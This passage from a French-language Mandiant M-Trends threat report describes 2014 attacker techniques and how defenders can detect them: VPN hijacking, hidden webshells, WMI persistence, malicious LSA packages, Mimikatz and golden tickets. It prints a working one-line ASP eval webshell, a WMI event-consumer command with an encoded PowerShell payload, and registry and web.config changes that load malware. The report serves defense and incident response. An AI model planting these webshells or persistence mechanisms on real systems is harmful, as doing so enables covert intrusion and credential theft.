tifiants, etc.) ont fait débat chez les spécialistes.
Mais leurs pires craintes se sont hélas réalisées.
Ainsi, quelques semaines après le signalement,
nous avons enquêté sur une attaque au cours de
laquelle cette faille avait servi à détourner les
sessions d’utilisateurs authentifiés pour accéder
au réseau de l’entreprise ciblée, et ce sans aucun
identifiant. Les semaines suivantes, les attaquants
répétèrent l’opération sur les infrastructures
VPN d’autres entreprises.
16. 14 www.mandiant.com
Les nouvelles du frontM-Trends
Dans tous ces cas de figures, les journaux des
connexions VPN ont gardé des traces révélatrices
des modes opératoires. Ainsi, les adresses IP en
provenance des sessions utilisateurs authenti-
fiées changeaient rapidement entre différents
blocs d’adresses, différents fournisseurs IP et
différentes zones géographiques.
Dissimulation de malwares sous le
nez des victimes
En 2014, la détection de malwares s’est de
nouveau apparentée à une course à l’armement
entre attaquants et défenseurs. Ainsi, on a
assisté à l’émergence de nouvelles techniques
permettant aux attaquants de camoufler leurs
actions et de dissimuler des malwares sur les
systèmes infectés.
Dissimulation de webshells
Connues sous le nom de webshells, les portes
dérobées basées sur le Web sont une forme de
malware apparu il y a une dizaine d’années.
Aujourd’hui, leurs capacités à échapper aux sys-
tèmes de détection des hôtes et des réseaux en
font un outil privilégié pour les attaques ciblées.
Figure 4 : Nouvelles techniques d’attaque observées durant les enquêtes Mandiant
Compromission
initiale
Implantation Escalade
des privilèges
Reconnaissance
interne
Mission
accomplie
Déplacement
latéral
Maintien
de présence
Détournement de
connexions VPN
Jamais Mandiant n’a observé
autant de cas d’accès malveil-
lants aux VPN des entreprises. Packages de sécurité malveillants
Les attaquants ont profité de l’extensi-
bilité des packages de sécurité
Windows pour charger des portes
dérobées et des enregistreurs de
mots de passe.
Dissimulation de webshells
Les attaquants n’ont cessé d’innover pour
déployer et dissimuler des malwares sur le Web.
Mandiant a observé plusieurs techniques, dont
les suivantes :
• Implantation sur les serveurs de scripts shell
exploitant le cryptage SSL pour contourner les
dispositifs de surveillance réseau
• Intégration d’une ligne de script shell ‘eval’ sur
des pages Web légitimes
• Fichiers de configuration serveurs modifiés
pour charger des fichiers DLL malveillants
Exploitation du système WMI
et du langage PowerShell
Pour maintenir leur présence, col-
lecter des données et se déplacer
latéralement dans les environne-
ments infiltrés, les attaquants ont
eu de plus en plus recours aux
composants Windows WMI et
PowerShell.
Attaques Kerberos
Après s’être approprié des privilèges d’administrateur
de domaine, les attaquants ont lancé des attaques
Kerberos « golden ticket » pour s’authentifier comme
n’importe quel utilisateur privilégié – même après
réinitialisation des mots de passe du domaine.
Mots de passe en clair
Les attaquants ont exploité des varian-
tes recompilées de l’utilitaire Mimikatz
pour récupérer des mots de passe en
clair dans la mémoire, tout en échap-
pant aux détections anti-virus.
À mesure que les défenses se
renforcent, les attaquants s’adap-
tent et innovent. En 2014, nous
avons constaté l’émergence de
nouvelles techniques de piratage à
chaque étape du cycle de vie des
attaques. En voici les grandes
lignes.
Nous avons étudié plusieurs cas où les atta
quants étaient parvenus à installer leurs
webshells sur des serveurs cryptant leurs
communications par SSL (Secure Layer Socket).
En conséquence, toutes les requêtes émises
vers et depuis la porte dérobée étaient cryptées
par la propre clé privée (légitimement installée)
du serveur. L’architecture réseau de la victime
n’ayant pas été configurée pour contrôler le
trafic SSL, les actions des attaquants sont
passées totalement inaperçues.
Nous prévoyons la poursuite de cette tendance,
à l’heure où de plus en plus d’entreprises adop-
tent le SSL pour crypter l’ensemble de leurs
services Web déployés sur Internet.
Autre technique furtive observée : le détour-
nement des pages Web légitimes à l’aide de
scripts shell ‘eval’. Conçus pour exécuter du code
à partir d’un paramètre de requête HTTP, ces
mini-scripts de quelques dizaines d’octets se
dissimulent facilement dans un fichier HTML
plus long.
17. www.mandiant.com 15
composants OS basiques et exécuter des com-
mandes. Par ailleurs, WMI fournit un framework
d’événements capable de déclencher des appli-
cations (y compris des malwares) en fonction
des changements d’état d’objets spécifiques.
Ces dernières années, nous n’avions rencontré
que peu de cas d’utilisation de WMI pour échap-
per aux détections. Ceci s’explique probable-
ment par la complexité des interactions WMI et
la disponibilité de techniques de persistance
plus simples et suffisamment efficaces pour
rester incognito. Toutefois, en 2014, quelques
groupes se sont servis de WMI pour maintenir
une présence discrète dans les environnements
infiltrés.
Cette technique consiste à créer trois objets
WMI (généralement à l’aide du langage Power-
Shell):
• Filtre d’événements : cet objet interroge le
système sur un événement récurrent (par
exemple une heure donnée ou le nombre de
secondes écoulées depuis le démarrage de
la machine) qui pourrait servir de mécanisme
de persistance.
• Consommateur d’événements : cet objet
exécute un script ou une commande spéci-
fique permettant de « consommer » l’événe-
ment. En général, les attaquants créent soit
des consommateurs d’événements de ligne
de commande (pour l’exécution d’une com-
mande arbitraire), soit des consommateurs
de script actif (pour l’exécution de scripts
VBScript).
• Liaison consommateur-filtre : cet objet
assure l’exécution d’un consommateur
d’événements lorsqu’un filtre est activé.
Figure 5 : Exemple de webshell ‘eval’
<%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%>
Figure 6 : Extrait de fichier web.config modifié
<!--HTTP Modules -->
<modules>
<add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” />
</modules>
Ainsi, pour les requêtes HTTP ordinaires, la page
Web infectée s’affiche normalement. Mais dès
lors que l’attaquant utilise un certain paramètre
dans sa requête, la commande ‘eval’ se met à
parser et exécuter le code malveillant.
La figure 5 montre un script shell ‘eval’ qui peut
être soit autonome, soit incorporé à une autre
page Web. Le client webshell de l’attaquant
devra intégrer le code malveillant dans le
paramètre de requête p1.
Dernier exemple de technique d’attaque par
malware sur le Web : la modification du fichier
de configuration (web.config) d’un serveur Web
exécutant les services Microsoft IIS (Internet
Information Services). Particulièrement astu-
cieuse, cette technique pousse le serveur infec-
té à charger un module HTTP malveillant. La
figure 6 montre un extrait « désinfecté » d’un
fichier web.config modifié.
Ce changement déclenche le chargement du
fichier BadModule.dll à partir d’un répertoire de
modules partagé et son utilisation pour le traite-
ment de toutes les requêtes Web ultérieures.
Ainsi, le malware parse et récupère les contenus
de toutes les requêtes Web envoyées au serveur
– y compris les identifiants utilisateurs. La figure 6
est un extrait de fichier web.config « désinfecté ».
Dans l’attaque réelle, le nom du module simule
une vraie DLL Microsoft. Pour échapper à toute
détection, l’attaquant modifie les horodatages
du malware et du fichier de configuration.
WMI comme vecteur de persistance
Composant majeur de Windows, WMI (Windows
Management Instrumentation) intègre un large
éventail d’interfaces et de fonctionnalités de
gestion système. Les applications et langages
comme PowerShell et VBScript utilisent WMI
pour collecter des données, interagir avec des
18. 16 www.mandiant.com
Les nouvelles du frontM-Trends
Figure 7 : Comment les attaquants utilisent WMI pour maintenir une présence persistante
WMI interroge régulièrement le système sur la requête dans le filtre d’événements.
Dans cet exemple, la condition associée au filtre est remplie tous les jours à 08h05.2
Une fois le filtre activé, WMI lance automatiquement le consommateur d’événe-
ments qui lui est rattaché. Cet exemple montre une partie du consommateur de
ligne de commande exécutant un script PowerShell avec un code malveillant
fourni sous forme d’argument encodé en Base64.
3
L’attaquant crée trois objets WMI à partir de commandes Powershell : un consom-
mateur qui exécute une commande ou un script, un filtre qui interroge le système
sur un événement récurrent et une liaison pour relier le filtre au consommateur.
1
Espace de noms WMI (rootsubscription)
Consommateur
d’événements
« Exécuter ce script ou
cette commande... »
Filtre d’événements
« Rechercher cet
événement récurrent
dans le système... »
Liaison consommateur-filtre
« Utiliser ce filtre pour déclencher
ce consommateur »
Set-WmiInstance
SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour
= 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60
CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe
–NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..."
19. www.mandiant.com 17
La figure 8 montre un exemple de syntaxe
PowerShell permettant de créer un consomma-
teur WMI de ligne de commande, chargé à son
tour d’exécuter le programme powershell.exe
– avec en argument une chaîne encodée en
Base64. N’importe quel code PowerShell (par
exemple un programme de téléchargement ou
une porte dérobée standard) pourra être ajouté
à cette chaîne, et ce sans aucun fichier de script
sur le disque. Rattaché à un filtre d’événements
approprié, ce consommateur pourra s’exécuter
de manière récurrente.
La persistance établie via WMI place les
analystes forensiques devant plusieurs défis.
Non seulement les commandes PowerShell
permettent aux attaquants de créer des filtres
et des consommateurs exécutables à la fois en
local et à distance, mais contrairement à de
nombreux mécanismes de persistance, ils ne
laissent aucune trace dans le registre.
Par ailleurs, les objets sont stockés sur disque
dans une base de données complexe (le référen-
tiel WMI object.data) et parfois difficile à analyser.
Enfin, Windows n’audite les filtres et consomma-
teurs nouvellement créés ou déclenchés que
lorsque la journalisation de niveau débogage est
activée. Or, cette journalisation n’est ni paramé
trée par défaut, ni destinée à être utilisée à long
terme en raison du volume important d’événe-
ments qu’elle génère.5
Packages de sécurité malveillants
À plusieurs occasions, les attaquants se sont ser-
vis des packages de sécurité LSA (Local Security
Authority) de Windows pour charger automa-
tiquement des malwares tout en échappant aux
systèmes de détection. Les packages de sécurité
sont un ensemble de fichiers DLL chargés par la
LSA au démarrage du système et configurés
sous le paramètre « Valeurs » de la clé de
registre HKLM SYSTEMCurrentControlSet
ControlLsa. Chacune de ces valeurs contient
une liste de chaînes référençant des noms de
fichiers (sans extension) à charger depuis
%SYSTEMROOT%system32.
Étant automatiquement chargés via le fichier
LSASS.EXE, les packages LSA permettent à un
attaquant doté de privilèges administrateur
d’ajouter ou modifier les valeurs nécessaires
pour maintenir la présence d’un fichier DLL
malveillant. Ainsi, une de nos enquêtes menées
en 2014 a révélé une modification de la valeur
Packages de sécurité pour maintenir la présence
du chargeur d’une porte dérobée multi-étapes,
tspkgEx.dll, sur le système.6
La figure 9 illustre la valeur modifiée.
Ce changement contraint le programme
LSASS.EXE à lancer le fichier DLL tspkgEx (C:
WINDOWSsystem32tspkgEx.dll) au démarrage
du système.
5
Organisés lors de la conférence Mandiant MIRcon 2014, les débats consacrés à WMI et PowerShell fournissent de plus amples détails et des études de
cas sur ces techniques – ainsi que des recommandations pour la détection et l’analyse forensique. Pour visionner les présentations, rendez-vous sur
https://dl.mandiant.com/EE/library/MIRcon2014/ MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf et https://dl.mandiant.com/EE/
library/MIRcon2014/MIRcon_2014_IR_Track_ Investigating_Powershell_Attacks.pdf.
6
Dans cet exemple, nous avons « désinfecté » le nom de la DLL.
Figure 8 : Extrait de commande PowerShell pour la création d’un consommateur WMI
Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsum-
er’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32
WindowsPowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8A-
bQ...<SNIP>”;RunInteractively=’false’}
Figure 9 : Modification de la clé HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages pour le chargement du malware
PACKAGES DE SÉCURITÉ (avant modification): kerberos msv1_0 schannel wdigest
tspkg pku2u
PACKAGES DE SÉCURITÉ (après modification): kerberos msv1_0 schannel wdigest
tspkg pku2u tspkgEx
20. 18 www.mandiant.com
Les nouvelles du frontM-Trends
L’extensibilité de LSA permet d’utiliser des pack-
ages de sécurité personnalisés pour traiter les
identifiants des utilisateurs lors d’une ouverture
de session. Or, un package de sécurité malveil-
lant peut détourner cette fonctionnalité pour
capturer des mots de passe en clair au moment
de la connexion.
Une de nos enquêtes menées en 2014 a mis en
lumière ce mode opératoire par lequel un atta-
quant a chargé un malware sous forme de pack-
age de sécurité qui lui a permis de faire main
basse sur des mots de passe. Largement dispo-
nible, le kit d’attaque Mimikatz7
intègre égale-
ment un outil, mimilib ssp, capable de voler des
mots de passe une fois lancé.8
Vol de mots de passe en toute
simplicité
Très répandus, les outils de vol d’identifiants ont
grandement facilité la collecte de mots de passe
et l’escalade de privilèges dans les environne-
ments Windows. En 2014, les auteurs d’attaques
ciblées ont eu principalement recours à deux
techniques :
• La méthode « pass-the-hash » pour
s’authentifier à l’aide de hashs NTLM volés
• L’outil Mimikatz pour récupérer les mots de
passe en clair dans la mémoire
À défaut de neutraliser complètement ces
méthodes, Microsoft est parvenu à en réduire
l’efficacité sur ses systèmes Windows Server
2012 R2 et Windows 8.1. Or, la plupart des
entreprises avec lesquelles nous avons travaillé
l’an dernier exploitaient encore des domaines
fonctionnels Windows Server 2008 et des
terminaux Windows 7.
De fait, « pass-the-hash » continue de faire des
ravages, notamment dans les environnements
où les mots de passe des administrateurs locaux
sont communs à tout un groupe de systèmes.
Quant à Mimikatz, il va encore plus loin en récu-
pérant les mots de passe Windows en clair que
l’OS stocke en mémoire pour gérer les diffé-
rentes formes d’authentifications uniques (SSO).
Sur le poste de travail d’un salarié, le risque peut
se limiter au seul mot de passe du compte de son
domaine. Mais dans le cas d’un serveur partagé
gérant de nombreuses sessions de connexion
interactives, par exemple via le protocole RDP
(Remote Desktop Protocol) ou l’utilitaire PsExec,
le nombre de mots de passe exposés sera
beaucoup plus élevé. Les entreprises victimes
n’ont pu que constater l’incroyable vitesse avec
laquelle l’infection de quelques systèmes
pouvait se propager à un domaine Active
Directory complet.
Presque toutes nos investigations ont révélé
l’incapacité des logiciels anti-virus des entre
prises à stopper Mimikatz, et ce malgré la
réputation et le vaste champ d’action de cet
outil. Pour échapper aux systèmes de détection,
les attaquants n’ont souvent eu qu’à modifier et
recompiler le code source. Mais ils ont aussi
déployé des variantes de l’outil, comme le script
PowerShell « Invoke-Mimikatz » qui s’exécute
uniquement en mémoire.
L’année 2014 a également vu l’émergence d’un
certain nombre d’attaques visant Kerberos, le
mécanisme d’authentification par défaut des
domaines Windows récents. Au premier rang
de ces attaques, on trouve le « golden ticket »
Mimikatz, qui permet à un intrus ayant com-
promis un contrôleur de domaine d’émettre
un ticket TGT (ticket-granting ticket) pour
n’importe quel utilisateur.
Presque toutes nos investigations ont révélé l’incapacité des logiciels anti-
virus des entreprises à stopper Mimikatz, et ce malgré la réputation et le
vaste champ d’action de cet outil. Pour échapper aux systèmes de détection,
les attaquants n’ont souvent eu qu’à modifier et recompiler le code source.
7
https://github.com/gentilkiwi/mimikatz5
8
Lors du MIRCon 2014, Matt Graeber a présenté ses nouvelles analyses sur les packages de sécurité malveillants et les mécanismes permettant de les
détecter et d’en limiter l’exploitation. À consulter sur https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_
SSP.pdf
21. www.mandiant.com 19
Ce « ticket en or » porte bien son nom puisqu’il
peut être généré hors ligne, rester valide pour
une durée indéterminée et être utilisé pour
usurper n’importe quel compte – même après la
réinitialisation d’un mot de passe. Une fois ce
ticket en main, un attaquant peut se réintroduire
sur un environnement « assaini » et se réappro-
prier instantanément les privilèges administra-
teur du domaine.
À défaut de pouvoir éviter la compromission
initiale, le seul moyen d’y remédier consiste à
réinitialiser deux fois de suite le mot de passe
krbtgt, nom du compte de service de distribution
de clés Kerberos. Cette procédure permet d’effa-
cer l’historique des mots de passe du compte et
d’annuler tous les tickets Kerberos précédem-
ment émis.
Déplacements latéraux avec WMI et
PowerShell
Par le passé, les déplacements latéraux et exécu-
tions de commandes d’attaque contre un envi-
ronnement Windows combinaient généralement
des utilitaires Windows intégrés (net, at, etc.),
des malwares personnalisés, des scripts de
commandes ou Visual Basic, et des outils d’admi-
nistration courants comme PsExec. Prisées des
attaquants du fait de leur fiabilité et de leur
simplicité d’utilisation, ces techniques laissent
cependant derrière elles bon nombre de traces
et d’empreintes compromettantes.
C’est ainsi qu’entre 2013 et 2014, nous avons
observé une évolution manifeste des modes de
déplacement latéral des groupes APT (Advanced
Persistent Threat) que nous surveillons. Désor-
mais, ces groupes ont davantage recours au
système WMI et au langage PowerShell pour se
déplacer latéralement, voler des identifiants et
glaner des informations utiles dans les environ-
nements Windows.
De même, un grand nombre de chercheurs en
sécurité et d’outils de tests d’intrusion ont adop-
té le langage PowerShell ces dernières années.
Cette généralisation a entraîné une plus grande
diffusion publique d’informations et de codes
source dont chaque camp profite pour se
perfectionner.
Nous avons décrit plus haut la manière dont les
attaquants exploitent des événements WMI
pour maintenir leur présence dans des environ
nements compromis. Outre cette méthode, ils
utilisent également l’outil de ligne de commande
wmic.exe pour étendre les fonctionnalités de
WMI aux scripts et à l’interface système (shell).
WMI leur sert à se connecter à des systèmes
distants, modifier le registre, accéder aux jour-
naux d’événements et, plus important encore,
exécuter des commandes. Hormis un événement
d’ouverture de session initiale, les commandes
WMI à distance ne laissent que très peu de
preuves sur le système infiltré.
Dans plusieurs cas analysés en 2014, les atta-
quants se sont appuyés sur des commandes
PowerShell à distance et des scripts en mémoire
pour se déplacer latéralement et récupérer des
données d’identification. Un code PowerShell
peut s’exécuter en mémoire sans jamais passer
par les disques du système infiltré, limitant ainsi
toute forme de trace. De plus, les anciennes
versions de PowerShell installées par défaut
dans la plupart des environnements ne peuvent
maintenir aucune piste d’audit détaillée du code
exécuté.
À RETENIR : Les auteurs d’APT ne cessent d’améliorer leurs outils et tactiques
pour laisser un minimum de traces et échapper aux systèmes de détection. C’est
pourquoi les entreprises ciblées doivent maintenir des dispositifs de surveillance en
temps réel et d’analyse forensique post-incident sur tous leurs terminaux, sources
de journaux et équipements réseau. Elles veilleront également à établir des seuils
d’activité normale et à intervenir proactivement en cas d’écart pour garder un coup
d’avance sur les attaquants.
22. 20 www.mandiant.com
Les nouvelles du frontM-Trends
N
ous avons passé l’an dernier à enquêter
sur des attaques qui nous ont permis de
remonter jusqu’à la piste russe. Ces
investigations ont toutefois révélé des zones
d’ombre qui rendent très difficile la distinction
entre les gangs de cybercriminels d’une part,
et les groupes étatiques d’autre part. Dans ce
contexte de fusion des divers outils et méthodes,
vous devrez orienter votre analyse sur les inten-
tions des attaquants pour en évaluer l’impact
potentiel.
Certaines des attaques ciblées à caractère fi-
nancier que nous avons disséquées présentent
une physionomie qui tient davantage des orga-
nisations étatiques que du profil type du cyber-
criminel opportuniste. La figure 10 en page 21
fait un point sur les croisements entre les
groupes APT connus et les cas de cybercrimes
que nous avons rencontrés en 2014.
Évaluer l’intention dans un climat
d’incertitude : une tâche délicate
Étant donné ces chevauchements, les analystes
doivent aborder leur décryptage des motiva-
tions avec une grande ouverture d’esprit. En ce
sens, il ne suffit pas de se pencher sur tel outil ou
telle méthode de manière isolée. Certaines
activités observées en Russie l’an passé mettent
en évidence l’importance et la difficulté d’une
analyse des objectifs finaux pour l’interprétation
de leur démarche technique.
En octobre 2014, nous avons exposé le détail
des activités d’APT28, un groupe que nous soup-
çonnons d’exfiltrer de l’intelligence politique et
militaire au profit du gouvernement russe.
Depuis des années, APT28 s’en prend à l’indus-
trie de la défense, aux puissances étrangères,
aux complexes militaires et aux organismes
intergouvernementaux.
Des chercheurs ont également révélé l’existence
d’un autre groupe basé en Russie et qui, comme
APT28, semble mener des activités d’espion-
nage pour Moscou. Cette seconde filière est
connue sous divers noms : “Sandworm Team,”9
“Quedagh”10
et “BE2 APT.”11
TENDANCE 4 :
ENTRE CYBERCRIMINELS ET
GROUPES APT, LA FRONTIÈRE
S’ESTOMPE
Les enquêtes menées l’an passé révèlent l’émergence d’une nouvelle tendance : les
cybercriminels tendent à s’inspirer des méthodes des auteurs d’APT, tandis que de
leur côté, ces derniers utilisent des outils déjà très en vogue chez les cybercriminels.
Face à cette convergence, il devient impératif de bien cerner les motivations d’une
attaque pour en évaluer l’impact et développer une stratégie de sécurité basée sur
le risque.
9
Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day.” iSight Partners. 14 octobre 2014. Web. 2 décembre 2014.
10
https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf
11
https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/
23. www.mandiant.com 21
12
https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html
13
APT18 est également un groupe basé en Chine. Voir https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html
TACTIQUES EXEMPLES DE CROISEMENTS
Ingénierie sociale
L’ingénierie sociale n’est pas la chasse gardée des groupes APT. En 2014, certaines attaques à
caractère financier ont eu recours au spearphishing et à ses e-mails ciblés, tant pour l’infection
initiale que lors de tentatives de reprise de contrôle de l’environnement post-neutralisation.
L’ingénierie sociale interactive représente une autre méthode utilisée à la fois chez les cyber-
criminels et les groupes APT. Sur l’une de nos missions, une attaque à motivation financière était
passée par des profils professionnels factices sur les réseaux sociaux. Le but : établir le contact
avec les salariés de l’entreprise ciblée et les inciter à télécharger un malware d’installation d’une
porte dérobée. De son côté, APT3, un groupe soupçonné de travailler pour une puissance
étrangère, a créé de toutes pièces un personnage de femme d’affaires qu’il a ensuite utilisé pour
contacter un collaborateur de sa cible sur un grand réseau social professionnel. Après trois
semaines d’échanges de messages, “elle” a envoyé son “CV” à l’adresse e-mail personnelle de son
interlocuteur – CV qui contenait en fait une porte dérobée du groupe APT3. Son travail de sape
s’est également étendu à d’autres collaborateurs de l’entreprise par des questions de type « Quel
est le nom de votre directeur informatique ? » ou « Vous utilisez quelle version de ce logiciel ? ».
Outils et malwares
personnalisés
La création d’outils personnalisés a cours tant dans le milieu des APT que du cybercrime financier.
Dans un cas précis, les cybercriminels ont même déployé plus de 60 variantes de malwares et d’uti-
litaires qu’ils avaient améliorés au cours de plusieurs années de présence furtive dans l’environne-
ment de la victime. Pour sa part, le groupe russe APT28 a passé ces sept dernières années à amélio-
rer la flexibilité de ses malwares de manière à maintenir sa présence dans un environnement infecté.
Crimeware
On retrouve dans cette catégorie tous les toolkits accessibles gratuitement ou vendus à des fins
lucratives. Le crimeware n’est cependant pas l’apanage des cybercriminels. Ainsi, un groupe sus-
pecté de lancer des attaques APT depuis la Russie a utilisé un exploit zero-day pour installer des
variantes de BlackEnergy, un toolkit très prisé des cybercriminels depuis des années. Dans un milieu
comme dans l’autre, les outils d’accès distant sont omniprésents12
, preuve s’il en est que les outils
eux-mêmes ne peuvent constituer le seul facteur déterminant dans l’attribution d’une attaque.
Maintien de la
persistance
Le cybercrime n’est plus dominé par le « smash-and-grab », sorte de vol éclair avec effraction. En
effet, si la persistance a longtemps été la signature des auteurs d’APT, qui maintiennent leur pré-
sence dans un environnement jusqu’à l’accomplissement de leur mission, le cybercrime financier
montre de plus en plus sa capacité à agir en sous-marin. Dans un cas précis, les cybercriminels sont
passés par les registres de démarrage Windows pour lancer le malware qui leur a permis de main-
tenir une présence incognito dans l’environnement. Dans un autre cas de figure, les malfaiteurs
sont parvenus à agir secrètement pendant 5 ans avant d’être débusqués. Nous avons même obser-
vé chez eux des tentatives de réimplantation dans l’environnement dont ils venaient d’être chassés.
Étendue du vol de
données
Le vol de données s’opère sur une échelle plus large et sur des ensembles de données plus volu-
mineux que jamais. Ainsi, les attaquants ont poursuivi leur offensive sur de vastes référentiels de
données d’identification personnelle (PII, Personally Identifiable Information). Historiquement, ces
vols de données étaient systématiquement imputés au milieu du cybercrime financier qui les
utilisait soit pour ses propres activités frauduleuses, soit pour les revendre sur un marché sous-
terrain. Or, les PII attirent désormais la convoitise des auteurs d’APT, et ce pour des raisons
totalement étrangères à tout appât du gain. Pour preuve, nous avons mis au grand jour des vols
de PII commis par le groupe APT18 – une activité qui sort de son périmètre d’action habituel.13
Figure 10 : La convergence des méthodes entre groupes APT et cybercriminels
24. 22 www.mandiant.com
Les nouvelles du frontM-Trends
14
http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/
15
https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml
16
BlackEnergy offre un framework extensible qui permet aux hackers d’ajouter de nouvelles caractéristiques et fonctionnalités via des bibliothèques DLL
(Dynamic Link Library). Chaque plugin DLL peut être codé pour un usage spécifique, puis stocké dans un fichier crypté. En surface, ils ont tous la même
apparence, ce qui complique le décryptage des intentions du hacker. Très prisé des cybercriminels, BlackEnergy est souvent utilisé pour des attaques de
déni de service (DDoS). (Voir http:// atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf; http://blogs.mcafee.com/business/
security-connected/evolving-ddos-botnets-1- blackenergy)
17
http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/
Le groupe ciblait manifestement les mêmes
profils de victimes qu’APT28, avec toutefois
quelques différences clés. À commencer par les
exploits zero-day et les outils de cybercrime
utilisés. On le soupçonne par ailleurs de s’être
attaqué à des infrastructures critiques aux
États-Unis.14, 15
Les analyses du malware et de l’infrastructure
utilisés ont révélé que l’équipe Sandworm s’est
servie du toolkit BlackEnergy16
pour cibler des
victimes en Ukraine, faisant ainsi écho aux
tensions actuelles avec la Russie. Le groupe
aurait également déployé ce toolkit pour cibler
des équipements SCADA (Supervisory Control
and Data Acquisition), très présents dans les
infrastructures critiques et les environnements
industriels.17
De même, les outils de production de diverses
industries se sont trouvés au cœur de la tempête.
En revanche, les prototypes mis au point par ces
entreprises et les réseaux contenant et trans-
mettant des informations sensibles (financières
et de propriété intellectuelle) n’ont pas été tou-
chés. On peut donc en déduire que les attaques
cherchaient des faiblesses à exploiter pour
commettre des actes de sabotage. En faisant
appel à du crimeware comme BlackEnergy, ils
tentaient vraisemblablement de garder un
certain degré d’anonymat.
Ces différences ont-elles une
importance ?
Dans le monde de la sécurité, le débat reste ou-
vert sur l’intérêt même de discerner les motiva-
tions d’une attaque et de l’attribuer à tel ou tel
auteur.
Certains avancent le fait que d’un point de vue
réseau, peu importe qui se cache derrière la
compromission : il faut d’abord la stopper et
l’éradiquer.
De même, la convergence des outils et méthodes
employés par les cybercriminels et les auteurs
d’APT complique encore un peu plus la question
autour de l’intention et de l’impact potentiel. Et
l’on ne parle même pas des dénégations et
manœuvres trompeuses des attaquants, des
disparités dans les mesures de répression, ou
des liens alambiqués que certains agents des
pouvoirs publics entretiennent avec la pègre.
Dans ce tableau pour le moins confus, le
décryptage des intentions et motivations d’une
attaque pourra guider votre intervention.
Prenons l’exemple d’un groupe russe menant
des activités de cyberespionnage au profit d’un
gouvernement. Derrière des outils de crime-
ware d’apparence classique, les attaquants
chercheront en fait à accéder à distance à des
pans entiers d’infrastructure critique aux
États-Unis. On comprend dès lors qu’une telle
attaque ne pourra pas être traitée de la même
manière qu’une menace financière ordinaire, et
ce malgré les similitudes dans l’arsenal utilisé.
Le fait de savoir si un malware est un vecteur
d’infection préalable à l’attaque d’un groupe
étatique, ou une simple menace mineure aux
effets bénins, changera sans aucun doute la
nature de votre réaction et de votre interven-
tion. De même, le vol de données orchestré par
des cybercriminels exigera une réponse
différente, compte tenu de l’immédiateté de
l’impact — contrairement à l’espionnage d’État
dans lequel l’usage de l’intelligence exfiltrée est
beaucoup plus nébuleux.
À RETENIR : Dans un contexte de convergence des outils, techniques et pro-
cédures utilisés par les cybercriminels d’une part, et les auteurs d’APT d’autre part,
vous devrez passer au crible les intentions et les motivations de chaque attaque.
Seule cette rigueur d’analyse vous permettra de bien diagnostiquer l’impact
potentiel d’un incident de sécurité, d’y répondre de manière adaptée et d’aligner
votre stratégie de défense sur la typologie des menaces en présence.
25. www.mandiant.com 23
À
l’heure où la cybersécurité prend le
devant de la scène, les entreprises
doivent aborder la question des vols de
données sous un angle nouveau — non pas
comme une source d’embarras et de crispation,
mais bien comme une réalité économique. Ils
devront pour cela anticiper et affronter les
incidents de sécurité avec confiance.
Or, cette attitude volontariste appelle à une nou-
velle approche de la cybersécurité. Personne ne
peut prévenir toutes les compromissions. Mais
la prévention, la détection, l’analyse et la neutra-
lisation rapides et efficaces des menaces les plus
avancées vous permettront de vous prémunir
vous-mêmes, vos clients et vos partenaires
contre les conséquences désastreuses qui font
la une des médias.
La sécurité infaillible n’existe pas. Personne ne
peut prévoir les nouvelles techniques d’infiltra-
tion. Et comme 2014 nous l’a rappelé, aucun
groupe d’attaque ne baissera pavillon sous le
seul prétexte qu’un nouvel outil de sécurité est
parvenu à le neutraliser.
Il n’en reste pas moins qu’avec un bon dosage de
technologies, d’intelligence et d’expertise, les
entreprises peuvent entamer un processus de
renforcement de leur sécurité. Ainsi, elles seront
capables de s’adapter pour garder un coup
d’avance sur les nouvelles menaces, les nou-
veaux outils et les nouveaux moyens de
compromission des réseaux.
Si les méchants sont rusés, bien équipés et
déterminés, il n’y a aucune raison que les
gentils ne le soient pas aussi.
CONCLUSION
L’an dernier, les attaquants ont poursuivi leur mutation, à mesure qu’ils élargis-
saient leur cible et modifiaient leurs modes opératoires. L’histoire est pourtant
restée la même : beaucoup trop d’entreprises n’étaient pas préparées à des
compromissions pourtant inévitables, laissant ainsi les attaquants agir trop long-
temps en toute quiétude dans les environnements compromis.
26. 24 www.mandiant.com
Les nouvelles du frontM-Trends
À propos de Mandiant
Mandiant, une entreprise FireEye, compte à son actif d’innombrables missions de réponse à incident
et d’élimination des groupes d’attaques avancés pour des centaines de clients dans tous les grands
secteurs d’activité. Nous sommes l’interlocuteur privilégié des grands groupes et administrations qui
veulent se protéger et réagir à des incidents de sécurité critiques de toutes natures. En cas d’intrusion
avérée, les services de conseil en sécurité de Mandiant interviennent à vos côtés pour riposter et
reprendre le contrôle de vos réseaux, avec l’appui de la cyberveille et des technologies FireEye.
À propos de FireEye
FireEye intervient dans le monde entier pour protéger les ressources critiques contre tout acte
malveillant. Ensemble, nos technologies, notre cyberveille, notre expertise et notre équipe d’interven-
tion rapide vous aident à éliminer l’impact des attaques informatiques. Nous débusquons et neutrali-
sons les attaquants à chaque étape d’une intrusion. Avec FireEye, vous détectez les attaques en temps
réel. Vous évaluez le risque qu’elles posent pour vos ressources stratégiques. Et vous disposez des
